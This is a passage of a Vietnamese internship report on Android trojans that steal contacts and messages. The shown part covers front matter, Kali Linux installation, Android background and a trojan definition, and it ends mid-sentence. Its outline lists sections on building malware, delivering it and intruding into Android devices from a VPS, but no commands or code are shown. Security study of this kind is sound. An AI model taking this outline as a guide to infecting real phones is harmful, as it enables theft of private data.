Security Kali Linux

ĐẠI HỌC QUỐC GIA THÀNH PHỐ HỒ CHÍ MINH TRUNG TÂM ĐÀO TẠO
TRƯỜNG ĐẠI HỌC BÁCH KHOA QUẢN TRỊ MẠNG & AN NINH
KHOA KHOA HỌC & KỸ THUẬT MÁY TÍNH MẠNG QUỐC TẾ ATHENA
BÁ O CÁ O ĐỀ TÀ I THỰ C TẬ P CNTT
Nghiên cứu các Trojan, Malware cho phép đánh

cắp dữ liệu như danh sách contact, tin nhắn trên
điên thoại sử dụng Android và gửi ra ngoài
GVHD: Thầ y VÕ ĐỖ THẮ NG
SVTH: Lê Cô ng Hậ u
MSSV: 51101058
TPHCM, ngà y 28 thá ng 07 nă m 2014

Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
LỜI CAM ĐOAN
Tô i xin cam đoan:

 Nhữ ng nộ i dung trong bá o cá o nà y là do tô i thự c hiện dướ i sự
hướ ng dẫ n trự c tiếp củ a thầ y Võ Đỗ Thắ ng.
 Mọ i tham khả o dù ng trong bá o cá o nà y đều đượ c trích dẫ n rõ
rà ng tên tá c giả , tên cô ng trình, thờ i gian, địa điểm cô ng bố .
 Mọ i sao chép khô ng hợ p lệ, vi phạ m quy chế đà o tạ o, hay gian lậ n,
tô i xin chịu hoà n toà n trá ch nhiệm.

Sinh viên thự c tậ p
Lê Cô ng Hậ u
SVTH: Lê Cô ng Hậ u 51101058
Trang 1
LỜI CẢM ƠN KHOA KH & KT MÁY TÍNH, ĐH BK

TPHCM
Tô i xin châ n thà nh cả m ơn trườ ng Đạ i Họ c Bá ch Khoa TPHCM và khoa

Khoa Họ c và Kỹ Thuậ t Má y Tính đã tạ o điều kiện cho tô i hoà n thà nh tố t đợ t
TTCN 2 nà y. Trong đợ t thự c tậ p nà y đã cho tô i nhữ ng kinh nghiệm quý bá u.
Nhữ ng kinh nghiệm này sẽ giú p tô i hoà n thiện hơn trong cô ng việc và mô i
trườ ng là m việc sau nà y.
Mặ c dù tô i đã cố gắ ng hoà n thà nh bá o cá o thự c tậ p tố t nghiệp nà y vớ i tấ t
cả nỗ lự c củ a bả n thâ n. Nhưng do trình độ hiểu biết và kinh nghiệm thự c tế có
hạ n nên chắ c chắ n khô ng thể trá nh khỏ i nhữ ng thiếu só t nhấ t định. Tô i rấ t
mong nhậ n đượ c sự đó ng gó p, chia sẻ để tô i có thể là m tố t hơn nữ a.
Mộ t lầ n nữ a tô i xin châ n thà nh cả m ơn.

Lê Cô ng Hậ u
Trang 2
LỜI CẢM ƠN TRUNG TÂM ATHENA
Tô i xin cả m ơn giá m đố c Cô ng Ty Quả n Trị và An Ninh Mạ ng Quố c Tế

Athena, cù ng cá c anh chị trong cô ng ty. Đặ c biệt, tô i xin châ n thà nh cả m ơn
thầ y Đỗ Võ Thắ ng đã nhiệt tình giú p đỡ và hướ ng dẫ n tô i trong suố t thờ i gian
thự c tậ p tạ i cô ng ty. Thầ y đã tạ o mọ i điều kiện thuậ n lợ i, cung cấ p nhũ ng kiến
thứ c cầ n thiết cũ ng như đó ng gó p nhữ ng ý kiến quý bá u để hoà n thà nh tố t bà i
bá o cá o này.
Mặ c dù tô i đã cố gắ ng hoà n thà nh bá o cá o thự c tậ p tố t nghiệp nà y vớ i tấ t
cả nỗ lự c củ a bả n thâ n. Nhưng do trình độ hiểu biết và kinh nghiệm thự c tế có
hạ n nên chắ c chắ n khô ng thể trá nh khỏ i nhữ ng thiếu só t nhấ t định. Tô i rấ t
mong nhậ n đượ c sự đó ng gó p, chia sẻ để tô i có thể là m tố t hơn nữ a.
Mộ t lầ n nữ a tô i xin châ n thà nh cả m ơn.

Lê Cô ng Hậ u
Trang 3
LỜI MỞ ĐẦU
Trong nhữ ng nă m gầ n đâ y, vấ n đề “An toà n và bả o mậ t thô ng tin” đang

ngà y cà ng nó ng. Vớ i sự phá t triển đến chó ng mặ t củ a cá c nền tả ng di độ ng như
iOS, Android, Windows Phone cù ng vớ i nhiều dò ng điện thoạ i thô ng minh, vấ n
đề bả o mậ t thô ng tin chuyển dầ n xu hướ ng từ PC sang mobile. Nếu bạ n đang sở
hữ u mộ t chiếc smartphone củ a Apple, Google Nexus, Samsung, Nokia, HTC, ...
liệu bạ n có dá m chắ c là “dế cưng” củ a mình khô ng bị nhiễm cá c phầ n mềm giá n
điệp, nghe lén khô ng? Vì sao lạ i như vậ y? Vì theo bá o cá o gầ n đâ y củ a cá c hãng
phầ n mềm bả o mậ t như Kaspersky Lab, Norton AV, Avast hay BKAV số lượ ng
smartphone bị nhiễm mã độ c ngà y cà ng tă ng. Đặ c biệt HĐH Android là mộ t
HĐH phá t triển khá nhanh trong nhữ ng nă m gầ n đâ y lạ i là mộ t mả nh đấ t béo
bở cho cá c Hacker tấ n cô ng. Vớ i sự nhẹ dạ cả tin, thiếu hiểu biết củ a ngườ i
dù ng, lò ng tham cá c cá c thứ “Free” như free app, free wifi đã vô tình tiếp tay
cho cá c Hacker xâ m nhậ p và cà i đặ t mã độ c trên chính chiếc điện thoạ i củ a bạ n.
Hô m nay mình viết bà i bá o cá o về đề tà i “Nghiên cứ u cá c trojan, malware
cho phép đá nh cắ p dữ liệu như danh sá ch contact, tin nhắ n trên điện thoạ i
Android và gử i ra ngoà i” để cù ng nghiên cứ u, tìm hiểu cá ch thứ c hoạ t độ ng,
chia sẻ thô ng tin cũ ng như cung cấ p cá c giả i phá p để phò ng trá nh.
Trang 4
NHẬN XÉT CỦA KHOA
..................................................................................................................................
..................................................................................................................................
..................................................................................................................................
..................................................................................................................................
..................................................................................................................................
..................................................................................................................................
..................................................................................................................................
..................................................................................................................................
..................................................................................................................................
..................................................................................................................................
..................................................................................................................................
..................................................................................................................................
..................................................................................................................................
..................................................................................................................................
..................................................................................................................................
..................................................................................................................................
..................................................................................................................................
..................................................................................................................................
..................................................................................................................................
..................................................................................................................................
..................................................................................................................................
..................................................................................................................................
TPHCM, ngà y ... thá ng ... nă m 2014
Trưở ng Khoa
Trang 5
NHẬN XÉT CỦA CÔNG TY THỰC TẬP
..................................................................................................................................
..................................................................................................................................
..................................................................................................................................
..................................................................................................................................
..................................................................................................................................
..................................................................................................................................
..................................................................................................................................
..................................................................................................................................
..................................................................................................................................
..................................................................................................................................
..................................................................................................................................
..................................................................................................................................
..................................................................................................................................
..................................................................................................................................
..................................................................................................................................
..................................................................................................................................
..................................................................................................................................
..................................................................................................................................
..................................................................................................................................
..................................................................................................................................
..................................................................................................................................
..................................................................................................................................
Giá m đố c
Trang 6
NHẬN XÉT CỦA GIÁO VIÊN HƯỚNG DẪN
..................................................................................................................................
..................................................................................................................................
..................................................................................................................................
..................................................................................................................................
..................................................................................................................................
..................................................................................................................................
..................................................................................................................................
..................................................................................................................................
..................................................................................................................................
..................................................................................................................................
..................................................................................................................................
..................................................................................................................................
..................................................................................................................................
..................................................................................................................................
..................................................................................................................................
..................................................................................................................................
..................................................................................................................................
..................................................................................................................................
..................................................................................................................................
..................................................................................................................................
..................................................................................................................................
..................................................................................................................................
Giá o viên hướ ng dẫ n
Trang 7
MỤC LỤC
LỜI CAM ĐOAN............................................................................................................................... 1
LỜ I CẢ M ƠN KHOA KH & KT MÁ Y TÍNH, ĐH BK TPHCM..............................................2
LỜ I CẢ M ƠN TRUNG TÂ M ATHENA......................................................................................3
LỜ I MỞ ĐẦ U..................................................................................................................................... 4
NHẬ N XÉ T CỦ A KHOA................................................................................................................. 5
NHẬ N XÉ T CỦ A CÔ NG TY THỰ C TẬ P....................................................................................6
NHẬ N XÉ T CỦ A GIÁ O VIÊ N HƯỚ NG DẪ N...........................................................................7
MỤ C LỤ C............................................................................................................................................ 8
1 GIỚI THIỆU CHUNG VỀ CÔNG TY THỰC TẬP..............................................9
2 NỘI DUNG THỰC TẬP...........................................................................................11
2.1 Là m trên localhost:........................................................................................................11

2.1.1 Giớ i thiệu HĐH Kali Linux:..............................................................................11
2.1.2 Cà i đặ t Kali Linux trên VMware:...................................................................13
2.1.3 Giớ i thiệu HĐH Android:..................................................................................29
2.1.4 Giớ i thiệu về Trojan:..........................................................................................32
2.1.5 Giớ i thiệu về Malware:......................................................................................34
2.1.6 Sinh mã độ c trên Kali Linux:..........................................................................36
2.1.7 Đưa mã độ c và o thiết bị Android:................................................................41
2.1.8 Xâ m nhậ p SD card củ a thiết bị Android từ Kali Linux:........................45
2.1.9 Kết luậ n:..................................................................................................................47
2.2 Là m trên VPS....................................................................................................................47
2.2.1 Giớ i thiệu về VPS:................................................................................................47
2.2.2 Cà i đặ t mã độ c trên VPS:..................................................................................49
2.2.3 Từ VPS xâ m nhậ p và o thiết bị Android:....................................................56
3 KẾT QUẢ ĐẠT ĐƯỢC............................................................................................60
4 KẾT LUẬN QUÁ TRÌNH THỰC TẬP................................................................61
Trang 8
1 GIỚI THIỆU CHUNG VỀ CÔNG TY THỰC TẬP
Cơ sở 1_Tại TP Hồ Chí Minh:

- Trung Tâ m Đà o Tạ o Quả n Trị Mạ ng và An Ninh Mạ ng Quố c Tế
ATHENA. Số 2 Bis Đinh Tiên Hoà ng, Phườ ng Đa Kao, Tp Hồ Chí
Minh, Việt Nam.
Điện thoạ i: ( 84-8 ) 3824 4041
Hotline: 0943 23 00 99
Cơ sở 2_Tại TP Hồ Chí Minh:

- Trung Tâ m Đà o Tạ o Quả n Trị Mạ ng và An Ninh Mạ ng Quố c Tế
ATHENA 92 Nguyễn Đình Chiểu ,Phườ ng Đa Kao,Quậ n 1, Tp Hồ
Chí Minh, Việt Nam.
Website: www.athena.edu.vn or www.athena.com.vn
Điện thoạ i: (84-8) 2210 3801

Hotline: 0943 20 00 88
- Trung Tâ m Đà o Tạ o Quả n Trị Mạ ng & An Ninh Mạ ng Quố c Tế ATHENA
đượ c thà nh lậ p từ nă m 2004, là mộ t tổ chứ c quy tụ nhiều trí thứ c trẻ
Việt Nam đầ y nă ng độ ng, nhiệt huyết và kinh nghiệm trong lã nh vự c
CNTT, vớ i tâ m huyết gó p phầ n và o cô ng cuộ c thú c đẩ y tiến trình đưa
cô ng nghệ thô ng tin là ngà nh kinh tế mũ i nhọ n, gó p phầ n phá t triển
nướ c nhà .
- Lĩnh vự c hoạ t độ ng:
 Trung tâ m ATHENA đã và đang tậ p trung chủ yếu và o đà o tạ o chuyên
sâ u quả n trị mạ ng, an ninh mạ ng, thương mạ i điện tử theo cá c tiêu
chuẩ n quố c tế củ a cá c hã ng nổ i tiếng như Microsoft, Cisco, Oracle,
Linux LPI, CEH... Song song đó , trung tâ m ATHENA cò n có nhữ ng
chương trình đà o tạ o cao cấ p dà nh riêng theo đơn đặ t hà ng củ a cá c
đơn vị như Bộ Quố c Phò ng, Bộ Cô ng An, ngâ n hà ng, doanh nghiệp, cá c
Trang 9
cơ quan chính phủ , tổ chứ c tà i chính…

 Sau gầ n 10 nă m hoạ t độ ng,nhiều họ c viên tố t nghiệp trung tâ m
ATHENA đã là chuyên gia đả m nhậ n cô ng tá c quả n lý hệ thố ng
mạ ng, an ninh mạ ng cho nhiều bộ ngà nh như Cụ c Cô ng Nghệ Thô ng
Tin - Bộ Quố c Phò ng , Bộ Cô ng An, Sở Thô ng Tin Truyền Thô ng cá c tỉnh,
bưu điện cá c tỉnh,…
 Ngoà i chương trình đà o tạ o, Trung tâ m ATHENA cò n có nhiều chương
trình hợ p tá c và trao đổ i cô ng nghệ vớ i nhiều đạ i họ c lớ n như đạ i họ c
Bá ch Khoa Thà nh Phố Hồ Chí Minh, Họ c Viện An Ninh Nhâ n Dâ n( Thủ
Đứ c), Họ c Viện Bưu Chính Viễn Thô ng, Hiệp hộ i an toà n thô ng tin
(VNISA), Viện Kỹ Thuậ t Quâ n Sự …
- Độ i ngũ giả ng viên:

 Tấ t cả cá c giả ng viên trung tâ m ATHENA có đều tố t nghiệp từ cá c
trườ ng đạ i họ c hà ng đầ u trong nướ c.... Tấ t cả giả ng viên ATHENA đều
phả i có cá c chứ ng chỉ quố c tế như MCSA, MCSE, CCNA, CCNP, Security+,
CEH,có bằ ng sư phạ m Quố c tế (Microsoft Certified Trainer). Đâ y là cá c
chứ ng chỉ chuyên mô n bắ t buộ c để đủ điều kiện tham gia giả ng dạ y tạ i
trung tâ m ATHENA.
 Bên cạ nh đó , cá c giả ng viên ATHENA thườ ng đi tu nghiệp và cậ p nhậ t
kiến thứ c cô ng nghệ mớ i từ cá c nướ c tiên tiến như Mỹ , Phá p, Hà Lan,
Singapore,... và truyền đạ t cá c cô ng nghệ mớ i nà y trong cá c chương
trình đà o tạ o tạ i trung tâ m ATHENA.
Trang 10
2 NỘI DUNG THỰC TẬP

2.1 Làm trên localhost:
2.1.1 Giới thiệu HĐH Kali Linux:
Kali Linux là mộ t hệ điều hà nh đượ c xâ y dự ng trên nhâ n Linux, đượ c thiết

kế để kiểm tra bả o mậ t, thử nghiệm xâ m nhậ p cá c hệ thố ng má y tính. Tiền thâ n
củ a Kali Linux là BackTrack, xuấ t hiện nă m 2006 và đượ c cá c chuyên gia đá nh
giá bả o mậ t ưa chuộ ng sử dụ ng. Sau 7 nă m liên tụ c phá t triển, thá ng 3 nă m
2013, hãng Offensive Security đã cô ng bố phiên bả n mớ i củ a BackTrack có tên
là Kali Linux (đượ c xem như phiên bả n BackTrack 6). Kali Linux tậ p hợ p và
phâ n loạ i gầ n như tấ t cả cá c cô ng cụ thiết yếu mà bấ t kì chuyên gia đá nh giá
bả o mậ t nà o cũ ng cầ n sử dụ ng khi tá c nghiệp.
Nó i về ưu điểm củ a Kali là nó i về nhữ ng thay đổ i giữ a BackTrack và Kali.

So vớ i BackTrack, Kali có rấ t nhiều cả i tiến:
Kali phát triển trên nền tảng hệ điều hành Debian

Điều nà y có nghĩa Kali có rấ t nhiều ưu điểm. Đầ u tiên là cá c Repository
(Kho lưu trữ phầ n mềm) đượ c đồ ng bộ hó a vớ i cá c Repository củ a Debian nên
Trang 11
có thể dễ dà ng có đượ c cá c bả n cậ p nhậ t vá lỗ i bả o mậ t mớ i nhấ t và cá c cậ p

nhậ t Repository. Duy trì cậ p nhậ t (up-to-date) đố i vớ i cá c cô ng cụ Penetration
Test là mộ t yêu cầ u vô cù ng quan trọ ng.
Mộ t lợ i thế khá c là mọ i cô ng cụ trong Kali đều tuâ n theo chính sá ch quả n
lý gó i củ a Debian. Điều này có vẻ khô ng quan trọ ng nhưng nó đả m bả o rõ ràng
về mặ t cấ u trú c hệ thố ng tổ ng thể, nó cũ ng giú p cho chú ng ta có thể dễ dà ng
hơn trong việc xem xét hoặ c thay đổ i mã nguồ n củ a cá c cô ng cụ .
Tính tương thích kiến trúc
Mộ t ưu điểm quan trọ ng trong Kali là nó đã cả i tiến khả nă ng tương thích
vớ i kiến trú c ARM. Từ khi Kali xuấ t hiện, nhiều phiên bả n ấ n tượ ng đã đượ c tạ o
ra. Giờ đâ y ta có thể build Kali trên mộ t Raspberry Pi hoặ c trên Samsung
Galaxy Note.
Hỗ trợ mạng không dây tốt hơn
Mộ t trong nhữ ng vấn đề đượ c cá c nhà phá t triển Kali chú trọ ng nhiều
nhấ t, chính là sự hỗ trợ cho mộ t số lượ ng lớ n phầ n cứ ng bên trong cá c thiết bị
mạ ng khô ng dâ y hay USB Dongles. Mộ t yêu cầ u quan trọ ng khi cá c chuyên gia
bả o mậ t thự c hiện đá nh giá mạ ng khô ng dâ y.
Khả năng tùy biến cao
Kali rấ t linh hoạ t khi đề cậ p đến giao diện hoặ c khả năng tuỳ biến hệ
thố ng. Đố i vớ i giao diện, giờ đâ y ngườ i dù ng đã có thể chọ n cho mình nhiều
loạ i Desktops như GNOME, KDE hoặ c XFCE tù y theo sở thích và thó i quen sử
dụ ng.
Dễ dàng nâng cấp giữa các phiên bản Kali trong tương lai
Đố i vớ i bấ t cứ ai sử dụ ng Kali, đâ y là mộ t tính nă ng quan trọ ng khi bả o trì
hệ điều hà nh Kali. Vớ i BackTrack, bấ t kỳ lú c nà o khi phiên bả n mớ i đượ c cô ng
bố thì chú ng ta đều phả i cà i lạ i mớ i hoà n toà n (Ngoạ i trừ phiên bả n R2 lên R3
nă m ngoá i).
Giờ đâ y vớ i Kali, nhờ và o sự chuyển đổ i sang nền tả ng hệ điều hà nh
Debian, Kali đã dễ dà ng hơn trong việc â ng cấ p hệ thố ng khi phiên bả n mớ i
xuấ t hiện, ngườ i dù ng khô ng phả i cà i lạ i mớ i hoà n toà n nữ a
Trang 12
2.1.2 Cài đặt Kali Linux trên VMware:
Trướ c tiên cầ n tả i về file ISO phiên bả n mớ i nhấ t củ a Kali Linux trên

link dướ i, bà i nà y ta sẽ tiến hà nh cà i phiên bả n Kali Linux 1.0.8 64 bit.
http://www.kali.org/downloads/
Hình 2.1.1 Download HĐH Kali Linux
Nếu họ c Cô ng nghệ thô ng tin thì chắ c chắ n bạ n sẽ biết đến phầ n
mềm có tên là VMware. VMware Workstation là mộ t phầ n mềm tạ o má y
ả o hà ng đầ u. Bạ n có thể dù ng VMware để tạ o 1 má y tính ả o chạ y
Windows, Linux, Mac OS hay thậ m chí là Android nữ a. VMware
Workstation 10 là mộ t phầ n mềm giả lậ p hệ điều hành để bà n rấ t nổ i
tiếng củ a hã ng VMware Inc. Vớ i hơn 50 tính nă ng mớ i, có thể thay đổ i
đá ng kể cá ch thứ c là m việc vớ i cá c má y ả o.
Từ giao diện chính củ a VMware thì nhấ n và o File -> New Vitual
Machine (hoặ c dù ng phím tắ t Ctrl + N).
Trang 13
Chọ n Typical và nhấ n Next. Đâ y là nhữ ng cà i đặ t mà VMware

khuyên dù ng nếu muố n tự thiết lậ p nhữ ng tù y chọ n thì nhấ n và o
Custom. Nếu khô ng rà nh thì tố t nhấ t cứ chọ n Typical đỡ phiền sau nà y.
Ở đâ y mình chọ n Custom và nhấ n next.
Hình 2.1.2 New Virtual Machine Wizard (Step 1)
Trang 14
Tick và o Installer Disc image file. Và chọ n đến file ISO cầ n cà i đặ t

VMware sẽ tự nhậ n diện đó là file iso củ a hệ điều hành nà o.
Trang 15
Sau đó sẽ chọ n tên má y ả o và nơi lưu trữ dữ liệu củ a nó
Trang 16
Ở nhữ ng bướ c sau thì cứ nhấn Next. Đến đâ y thì có mộ t tù y chọ n là

“Customize Hardware...” Cá i nà y để thay đổ i cá c thô ng số như dung
lượ ng RAM, Ổ cứ ng, USB Controler… Cũ ng tù y và o hệ điều hà nh đang cà i
mà chọ n dung lượ ng cho phù hợ p. VMware cũ ng đã chọ n cho mình 1
dung lượ ng phù hợ p rồ i.
Sau khi hoà n thà nh cá c bướ c này thì má y ả o sẽ tự độ ng bậ t và sẽ tiến

hà nh cà i đặ t mộ t cá ch tự độ ng. Tù y và o dung lượ ng mà quá trình sẽ diễn
ra nhanh hay chậ m thô ng thườ ng thì mấ t và i chụ c phú t cho đến và i
tiếng. Tuy nhiên vớ i nhữ ng file ISO khô ng hỗ trợ nhậ n diện tự độ ng thì
bạ n vẫ n sẽ phả i cà i bằ ng tay từ ng bướ c như cà i win bình thườ ng (điều
này cũ ng khô ng khó khă n lắ m đú ng khô ng?)
Trang 17
Bạ n sẽ nhìn thấ y mà n hình khở i độ ng củ a Kali. Chọ n mộ t trong hai

chế độ cà i đặ t là Graphical hoặ c Text-Mode. Trong bà i viết nà y tô i sẽ
chọ n Graphical Install
Hình 2.1.6 Graphical Install
Trang 18
Chọ n ngô n ngữ , vị trí đấ t nướ c củ a bạ n sau đó click Continue
Hình 2.1.7 Select a language
Hình 2.1.8 Select your location
Trang 19
Bạ n cũ ng sẽ đượ c yêu cầ u để cấ u hình bà n phím vớ i bà n phím bạ n

đang sử dụ ng
Hình 2.1.9 Configure the keyboard
Trang 20
Bạ n sẽ cầ n phả i cấ u hình Network và Password cho tà i khoả n Root
Hình 2.1.10 Configure the network
Hình 2.1.11 Set up user and password
Trang 21
Tiếp đến bạ n sẽ lự a chọ n ổ đĩa bạ n sẽ cà i đặ t Kali.
Hình 2.1.12 Partition disks (Step 1)
Trang 22
Trang 23
Trang 24
Sau khi cấ u hình Partition xong, nhấ n Continue để quá trình cà i đặ t

bắ t đầ u.
Hình 2.1.18 Install the system
Trang 25
Cấ u hình Mirror. Kali sử dụ ng mộ t kho lưu trữ trung tâ m để phâ n

phố i cá c ứ ng dụ ng. Bạ n sẽ cầ n phả i nhậ p thô ng tin proxy thích hợ p khi
cầ n thiết. Chú ý: Nếu bạ n chọ n “No” trong mà n hình nà y, bạ n sẽ khô ng
thể cà i đặ t cá c gó i từ kho lưu trữ củ a Kali.
Hình 2.1.19 Configure the package manager
Trang 26
Tiếp đến là cà i đặ t GRUB
Hình 2.1.20 Install the GRUB boot loader on the hard disk
Cuố i cù ng, nhấ p và o Continue để khở i độ ng lạ i Kali.
Hình 2.1.21 Finish the installation
Trang 27
Mà n hình đă ng nhậ p và sau khi bạ n đă ng nhậ p và o Kali.
Hình 2.1.22 Kali Linux login
Trang 28
Giao diện sau khi cà i đặ t xong:
Hình 2.1.23 Kali Linux OS
2.1.3 Giới thiệu HĐH Android:
Trang 29
Lịch sử
Tổng công ty Android (Android, Inc.) đượ c thành lập tạ i Palo Alto, California
vào tháng 10 năm 2003 bở i Andy Rubin (đồ ng sáng lập cô ng ty Danger), Rich
Miner (đồng sáng lập Tổng công ty Viễn thông Wildfire), Nick Sears (từ ng là Phó
giám đố c T-Mobile), và Chris White (trưở ng thiết kế và giao diện tại WebTV) để
phát triển, theo lờ i củ a Rubin, "các thiết bị di động thông minh hơn có thể biết
đượ c vị trí và sở thích củ a ngườ i dù ng". Dù nhữ ng ngườ i thành lập và nhân viên
đều là nhữ ng ngườ i có tiếng tăm, Tổng công ty Android hoạt độ ng một cách âm
thầm, chỉ tiết lộ rằng họ đang làm phần mềm dành cho điện thoại di động. Trong
năm đó, Rubin hết kinh phí. Steve Perlman, mộ t ngườ i bạn thân củ a Rubin, mang
cho ông 10.000 USD tiền mặ t nhưng từ chối tham gia vào cô ng ty.
Google mua lại Tổng cô ng ty Android vào ngày 17 tháng 8 năm 2005, biến nó
thành mộ t bộ phận trự c thuộ c Google. Nhữ ng nhân viên củ a chủ chố t củ a Tổng
cô ng ty Android, gồ m Rubin, Miner và White, vẫn tiếp tụ c ở lạ i cô ng ty làm việc sau
thương vụ này. Vào thờ i điểm đó khô ng có nhiều thông tin về Tổng công ty, nhưng
nhiều ngườ i đồn đoán rằng Google dự tính tham gia thị trườ ng điện thoạ i di động
sau bướ c đi này. Tại Google, nhóm do Rubin đứ ng đầu đã phát triển một nền tảng
thiết bị di độ ng phát triển trên nền nhân Linux. Google quảng bá nền tảng này cho
các nhà sản xuất điện thoại và các nhà mạ ng vớ i lờ i hứ a sẽ cung cấp một hệ thống
uyển chuyển và có khả năng nâng cấp. Google đã liên hệ vớ i hàng loạ t hãng phần
cứ ng cũ ng như đối tác phần mềm, bắn tin cho các nhà mạ ng rằng họ sẵn sàng hợ p
tác vớ i các cấp độ khác nhau.
Ngày càng nhiều suy đoán rằng Google sẽ tham gia thị trườ ng điện thoạ i di
động xuất hiện trong tháng 12 năm 2006. Tin tứ c củ a BBC và Nhậ t báo phố Wall
chú thích rằng Google muốn đưa cô ng nghệ tìm kiếm và các ứ ng dụ ng củ a họ vào
điện thoại di độ ng và họ đang nỗ lự c làm việc để thự c hiện điều này. Các phương
tiện truyền thông truyền thống lẫn online cũ ng viết về tin đồn rằng Google đang
phát triển một thiết bị cầm tay mang thương hiệu Google. Một vài tờ báo còn nó i
rằng trong khi Google vẫn đang thự c hiện nhữ ng bản mô tả kỹ thuậ t chi tiết, họ đã
trình diễn sản phẩm mẫu cho các nhà sản xuất điện thoại di động và nhà mạng.
Tháng 9 năm 2007, InformationWeek đăng tải một nghiên cứ u củ a Evalueserve
cho biết Google đã nộp mộ t số đơn xin cấp bằng sáng chế trong lĩnh vự c điện thoạ i
di động.
Ngày 5/11/2007, Liên minh thiết bị cầm tay mở (Open Handset Alliance),
mộ t hiệp hội bao gồm nhiều cô ng ty trong đó có Texas Instruments,Tậ p đoàn
Broadcom, Google, HTC, Intel, LG, Tậ p đoàn MarvellTechnology, Motorola, Nvidia,
Qualcomm, Samsung Electronics, Sprint Nextel và T-Mobile đượ c thành lậ p vớ i
mụ c đích phát triển các tiêu chuẩn mở cho thiết bị di động. Cù ng ngày, Android
cũ ng đượ c ra mắt vớ i vai trò là sản phẩm đầu tiên củ a Liên minh, một nền tảng
thiết bị di độ ng đượ c xây dự ng trên nhân Linux phiên bản 2.6. Chiếc điện thoạ i
chạy Android đầu tiên đượ c bán ra là HTC Dream, phát hành ngày 22 tháng 10
năm 2008. Biểu tượ ng củ a hệ điều hành Android mớ i là mộ t con rô bố t màu xanh
Trang 30
lá cây do hãng thiết kế Irina Blok tạ i California vẽ.

Từ năm 2008, Android đã trải qua nhiều lần cập nhật để dần dần cải tiến hệ
điều hành, bổ sung các tính năng mớ i và sử a các lỗ i trong nhữ ng lần phát hành
trướ c. Mỗi bản nâng cấp đượ c đặ t tên lần lượ t theo thứ tự bảng chữ cái, theo tên
củ a một mó n ăn tráng miệng; ví dụ như phiên bản 1.5 Cupcake (bánh bô ng lan nhỏ
có kem) tiếp nối bằng phiên bản 1.6 Donut (bánh vòng). Phiên bản mớ i nhất
(chính thứ c) là 4.4 KitKat (bánh chocolate). Vào năm 2010, Google ra mắt loạ t thiết
bị Nexus - một dò ng sản phẩm bao gồ m điện thoại thông minh và máy tính bảng
chạy hệ điều hành Android, do các đối tác phần cứ ng sản xuất. HTC đã hợ p tác vớ i
Google trong chiếc điện thoại thông minh Nexus đầu tiên, Nexus One. Kể từ đó
nhiều thiết bị mớ i hơn đã gia nhập vào dòng sản phẩm này, như điện thoạ i Nexus 4
và máy tính bảng Nexus 10, lần lượ t do LG và Samsung sản xuất. Google xem điện
thoạ i và máy tính bảng Nexus là nhữ ng thiết bị Android chủ lự c củ a mình, vớ i
nhữ ng tính năng phần cứ ng và phần mềm mớ i nhất củ a Android.
Đặc điểm
1. Tính mở . Android đượ c xây dự ng từ dướ i đi lên cho phép ngườ i phát triển
tạ o các ứ ng dụ ng di động hấp dẫn vớ i đầy đủ các điểm mạnh củ a các thiết
bị cầm tay hiện có . Android hoàn toàn mở , một ứ ng dụ ng có thể gọ i tớ i bất
kể một chứ c năng lõi củ a điện thoại như tạo cuộc gọi, gử i tin nhắn hay sử
dụ ng máy ảnh, cho phép ngườ i phát triển tạ o phong phú hơn, liên kết hơn
các tính năng cho ngườ i dù ng. Android đượ c xây dự ng trên nhân Linux
mở . Thêm nữ a, nó sử dụ ng một máy ảo mà đã đượ c tố i ưu hóa bộ nhớ và
phần cứ ng vớ i môi trườ ng di động. Android mà một mã nguồn mở , nó có
thể đượ c mở rộng để kết hợ p tự do giữ a các công nghệ nổ i trội. Nền tảng
này sẽ tiếp tụ c phát triển bở i cộ ng đồng phát triển để tạ o ra các ứ ng dụ ng
di động hoàn hảo.
2. Tính ngang bằng củ a các ứ ng dụ ng. Vớ i Android, không có sự khác nhau
giữ a các ứ ng dụ ng điện thoại cơ bản vớ i ứ ng dụ ng củ a bên thứ ba. Chú ng
đượ c xây dự ng để truy cập như nhau tớ i mộ t loạt các ứ ng dụ ng và dịch vụ
củ a điện thoại. Vớ i các thiết bị đượ c xây dự ng trên nền tảng Android,
ngườ i dù ng có thể đáp ứ ng đầy đủ các nhu cầu mà họ thích. Chú ng ta có
thể đổ i màn hình nền, kiểu gọ i điện thoạ i, hay bất kể ứ ng dụ ng nào. Chú ng
ta thậ m chí có thể hướ ng dẫn điện thoại chỉ xem nhữ ng ảnh mình thích.
3. Phá vỡ rào cản phát triển ứ ng dụ ng. Android phá vỡ rào cản để tạ o ứ ng
dụ ng mớ i và cải tiến. Mộ t ngườ i phát triển có thể kết hợ p thông tin từ
trang web vớ i dữ liệu trên điện thoạ i cá nhân – chẳng hạn như danh bạ ,
lịch hay vị trí trên bản đồ – để cung cấp chính xác hơn cho ngườ i khác. Vớ i
Android, ngườ i phát triển có thể xây dự ng mộ t ứ ng dụ ng mà cho phép
ngườ i dù ng xem vị trí củ a nhữ ng ngườ i bạn và thông báo khi họ đang ở vị
trí lân cận. Tất cả đượ c lập trình dễ dàng thông qua sự hỗ trợ củ a
MapView và dịch vụ định vị toàn cầu GPS.
4. Xây dự ng ứ ng dụ ng dễ dàng và nhanh chó ng. Android cung cấp bộ thư
viện giao diện lậ p trình ứ ng dụ ng đồ sộ và các công cụ để viết các ứ ng
Trang 31
dụ ng phứ c tạp. Ví dụ , Android có thể cho phép ngườ i phát triển biết đượ c
vị trí củ a thiết bị và cho phép các thiết bị giao tiếp vớ i nhau để có thể tạ o
nên mạ ng xã hội chia sẻ ngang hàng rộng khắp. Thêm nữ a, Android còn
bao gồm một bộ công cụ đầy đủ giú p cho việc phát triển trở nên dễ dàng.
2.1.4 Giới thiệu về Trojan:
Trojan - mộ t chương trình dạ ng virus, mộ t kẻ là m nộ i giá n trong má y tính

củ a bạ n đã giú p cho hacker điều khiển má y tính củ a bạ n, Trojan giú p hacker
lấ y nhữ ng thô ng tin quý bá u củ a bạ n, thậ m chí hắ n có thể xó a hoặ c định dạ ng
lạ i cả ổ cứ ng củ a bạ n nữ a. Trojan có thể nhiễm và o má y củ a bạ n qua tậ p tin gắ n
kèm thư điện tử mà bạ n đã vô tình tả i về và chạ y thử , hoặ c có lẫ n trong nhữ ng
chương trình trò chơi, nhưng chương trình mà bạ n khô ng rõ nguồ n gố c... Ðể
"moi ruộ t" đượ c mậ t khẩ u củ a cá c chủ thuê bao, hacker nộ i thườ ng sử dụ ng
virus có họ Trojan gử i đến cá c thuê bao cầ n tấ n cô ng thô ng qua thư điện tử (e-
mail) dướ i dạ ng dữ liệu đính kèm (File Attachment). Chỉ cầ n khi cá c chủ thuê
